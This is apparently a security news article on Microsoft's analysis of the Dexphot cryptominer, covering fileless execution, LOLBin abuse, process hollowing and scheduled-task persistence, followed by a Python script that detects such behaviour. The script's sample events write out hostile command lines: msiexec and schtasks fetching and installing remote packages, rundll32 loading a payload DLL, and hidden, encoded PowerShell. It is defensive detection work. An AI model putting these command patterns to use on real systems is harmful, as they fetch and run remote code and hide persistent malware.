Dexphot's goal has always been ordinary: mine cryptocurrency and enrich its operators. Yet, as the researchers note, its authors used sophisticated techniques for such a mundane purpose, and the damage it did was not trivial. Many of the techniques involved are ones you would expect to encounter studying the work of “government hackers”, not in just another miner.
“Dexphot was a second-level payload, that is, it infected computers already infected with the ICLoader malware, which penetrated the system bundled with various software packages, or when users downloaded and installed cracked or pirated software,” say information security specialists at Microsoft.
Interestingly, the Dexphot installer was the only part of the malware that was written to disk, and only for a short time. For everything else, Dexphot used a fileless approach: its other components ran only in the computer's memory, which hid the malware from classical antivirus solutions that rely on file signatures.
Dexphot also used the LOLBins (living off the land binaries) technique: it executed its malicious code through legitimate Windows processes rather than launching executables and processes of its own. According to Microsoft, the malware regularly abused msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe and powershell.exe. Because its code ran inside these processes, Dexphot was hard to distinguish from legitimate local applications that use the same utilities in their own work. A defender therefore has to look at how these binaries are invoked (command lines, parent process, the paths they load from) rather than at the binaries themselves.
In addition, Dexphot used a technique called polymorphism.
“Dexphot operators changed the file names and URLs used in the infection process every 20-30 minutes. By the time antivirus solutions detected a pattern in the Dexphot infection chain, it had already changed. This allowed Dexphot to stay one step ahead,” said Microsoft experts.
Since no malware stays unnoticed forever, the Dexphot developers also took care of persistence on the system. The malware used process hollowing: it launched two legitimate processes (svchost.exe and nslookup.exe), hollowed out their contents and ran malicious code under their guise. These components, disguised as legitimate Windows processes, made sure that every part of the malware was up and running and reinstalled the malware if necessary.
Additionally, Dexphot used a series of scheduled tasks (regularly renaming them) so that the victim was filelessly re-infected after every system reboot and every 90 or 110 minutes. The same mechanism let the operators regularly update the malware on all infected hosts: each time one of the tasks ran, it downloaded the file from the attacker's server, where they could change it at will.
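The practical consequence of the LOLBin abuse, the rotating file names and URLs, and the scheduled-task persistence described above is that detection has to key on behaviour rather than on names. The following is an added example (not Microsoft's detection logic and not any Dexphot component) of that approach in Python: it scans process-creation records shaped like Sysmon Event ID 1 (Image, CommandLine, ParentImage) and flags msiexec.exe pulling a package from any URL, rundll32.exe loading a module from a user-writable directory, powershell.exe started with encoded or hidden-window flags, schtasks.exe creating a task that re-runs on a long minute interval or invokes another LOLBin, and any LOLBin spawned by another LOLBin or by something living in a user-writable path. The sample events, file paths, task name, URL and the 60-minute threshold are all constructed for the example.

```python
"""Behaviour-keyed detection of LOLBin abuse and short-interval scheduled
tasks over process-creation events.  Added illustration only: this is not
Microsoft's detection logic or any Dexphot component.  The event records,
paths, URLs and thresholds below are constructed for the example."""
import re
from dataclasses import dataclass

LOLBINS = {"msiexec.exe", "rundll32.exe", "schtasks.exe",
           "powershell.exe", "unzip.exe"}
# Locations a signed Windows binary should not be loading payloads from.
USER_WRITABLE = re.compile(r"\\(programdata|appdata|temp|users\\public)\\", re.I)
URL = re.compile(r"https?://", re.I)          # any URL, not a specific domain
PS_SUSPICIOUS = re.compile(
    r"(-e(nc|ncodedcommand)?\b|downloadstring|iex\b|invoke-expression|"
    r"-w(indowstyle)?\s+hidden|frombase64string)", re.I)
SCHTASKS_MINUTE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
REPEAT_THRESHOLD_MIN = 60                      # assumption for the example


@dataclass
class Event:
    """Mirrors the Image / CommandLine / ParentImage fields of a Sysmon
    Event ID 1 (process creation) record."""
    image: str
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(ev: Event) -> list[str]:
    """Return the behavioural findings for one event (empty if benign)."""
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
    hits: list[str] = []
    if img not in LOLBINS:
        return hits
    if img == "msiexec.exe" and URL.search(cl):
        hits.append("msiexec installing a package from a remote URL")
    if img == "rundll32.exe" and USER_WRITABLE.search(cl):
        hits.append("rundll32 loading a module from a user-writable path")
    if img == "powershell.exe" and PS_SUSPICIOUS.search(cl):
        hits.append("powershell with encoded/download/hidden-window flags")
    if img == "schtasks.exe" and "/create" in cl.lower():
        m = SCHTASKS_MINUTE.search(cl)
        if m and int(m.group(1)) >= REPEAT_THRESHOLD_MIN:
            hits.append(f"scheduled task re-running every {m.group(1)} minutes")
        if USER_WRITABLE.search(cl) or any(b in cl.lower() for b in LOLBINS - {img}):
            hits.append("scheduled task action invokes a LOLBin or user-writable path")
    # Parent/child relationship: a LOLBin started by another LOLBin or by
    # something living in a user-writable directory is itself a signal.
    if parent in LOLBINS or USER_WRITABLE.search(ev.parent_image):
        hits.append(f"{img} spawned by {parent}")
    return hits


def scan(events: list[Event]) -> list[tuple[int, str, list[str]]]:
    """Return (index, image, findings) for every event with at least one finding."""
    out = []
    for i, ev in enumerate(events):
        hits = analyze(ev)
        if hits:
            out.append((i, basename(ev.image), hits))
    return out


# Constructed sample telemetry: two benign events, then a chain shaped like
# the one described in the article (paths, task name and URL are made up).
SAMPLE_EVENTS = [
    Event(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs",
          r"C:\Windows\System32\services.exe"),
    Event(r"C:\Windows\System32\rundll32.exe",
          r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
          r"C:\Windows\explorer.exe"),
    Event(r"C:\Windows\System32\msiexec.exe",
          "msiexec.exe /i http://example.invalid/pkg.msi /q",
          r"C:\ProgramData\Setup\loader.exe"),
    Event(r"C:\Windows\System32\rundll32.exe",
          r"rundll32.exe C:\ProgramData\Data\payload.dll,Start",
          r"C:\Windows\System32\msiexec.exe"),
    Event(r"C:\Windows\System32\schtasks.exe",
          'schtasks.exe /create /tn "SysUpdate" /sc minute /mo 90 '
          '/tr "msiexec.exe /i http://example.invalid/u.msi /q"',
          r"C:\Windows\System32\rundll32.exe"),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -w hidden -enc SQBFAFgA",
          r"C:\Windows\System32\rundll32.exe"),
]

if __name__ == "__main__":
    for idx, image, findings in scan(SAMPLE_EVENTS):
        print(f"event {idx} {image}:")
        for f in findings:
            print(f"  - {f}")
```

Run stand-alone, the script flags the four events of the constructed chain and leaves the two benign ones (svchost.exe from services.exe, rundll32.exe loading shell32.dll from System32) untouched. None of the rules mention a file name or a domain, which is the point: renaming a payload or rotating a URL every 20-30 minutes does not change the parent process, the load path or the task interval that the rules key on.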